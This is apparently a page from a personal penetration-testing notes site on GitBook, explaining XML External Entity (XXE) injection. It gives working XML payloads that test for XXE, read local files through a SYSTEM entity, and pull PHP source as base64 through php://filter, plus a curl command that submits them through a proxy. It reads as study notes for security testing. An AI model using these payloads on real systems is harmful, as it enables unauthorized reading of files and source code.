👨‍💻
Hacking Notes
  • Hacking Notes
  • 💅One-Liners
  • ⚔️Offensive
    • Exploit Workflow
    • Recon
      • OSINT
      • DNS
        • Domain Discovery
      • Layer 2 Config and Analysis
      • Port Scanning and Discovery
      • Port Attacks
      • Link it all together
    • Payloads
      • MSFVenom
      • Reverse Shells
    • Websites
      • Enumeration
      • Injection/LFI
      • Session Management
      • Brute Forcing
      • JavaScript & XSS
      • SSRF
      • XXE
      • PHP
    • Password Attacks
      • Brute Forcing
      • Mimikatz
      • Password Cracking
      • Hash Extraction
      • Wordlist Generation
    • Databases
      • SQL
      • Mongodb
    • Microsoft Windows Exploits
      • Enumeration
      • Powershell
      • Cmd
      • Privilege Escalation
      • Active Directory
      • Bloodhound
    • Social Engineering
    • Netcat & Socat
    • File Transfers
    • Metasploit
      • Writing Modules
    • PS Empire
    • Priv Escalation
    • Post Exploitation
    • Pivoting
    • Certs and Secrets
    • NGROK
    • Misc.
  • 🛡️Defensive
    • Defensive Notes
    • Windows Forensics
      • Program Execution Artifacts
      • ASEP Locations
      • Event Logs
    • Linux Forensics
    • Network Forensics
      • tshark
      • Wireshark Filters
    • Memory Forensics
    • Stego
    • Malware Analysis
    • Volatility
  • 🌩️Cloud
    • Scope and Shared Responsibility
    • AWS CLI
    • Azure CLI
    • SaaS Attacks
    • PaaS
  • ⌨️Programming
    • Programming Notes
    • Examples and Quick Scripts
    • PowerShell
    • Pwn
      • Windows Pwn
    • Python
      • Basic Python
      • Modules
      • Working with Files
      • Networking
      • Attack Related
      • Scapy
        • Using Scapy
        • Reading PCAP
    • C
      • Code Examples
      • GDB
    • PHP
Powered by GitBook
On this page

Was this helpful?

  1. Offensive
  2. Websites

XXE

XML External Entity

XXE can be used to access local files on the host, potential RFI for internal hosts, and RCE in very specific circumstances. By creating custom XML elements, we can create specific entities for us to use.

Determine if XXE is triggered:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe "haha, this is xxe!">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

This is for LFI:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///tmp/messages_outbound.txt">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

Sometimes PHP or Apache will prevent a php file from being loaded. If this is the case, we can actually have PHP encode the file as Base64 to bypass some controls.

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>

We can easily submit the xml file to the endpoint using curl's @ feature for files. This also proxies the connection through an interception proxy to let us peek into the response on the tool.

curl --proxy 127.0.0.1:8082 -k -d@./test.xml http://m4lwhere.org/post.php
PreviousSSRFNextPHP

Last updated 3 years ago

Was this helpful?

⚔️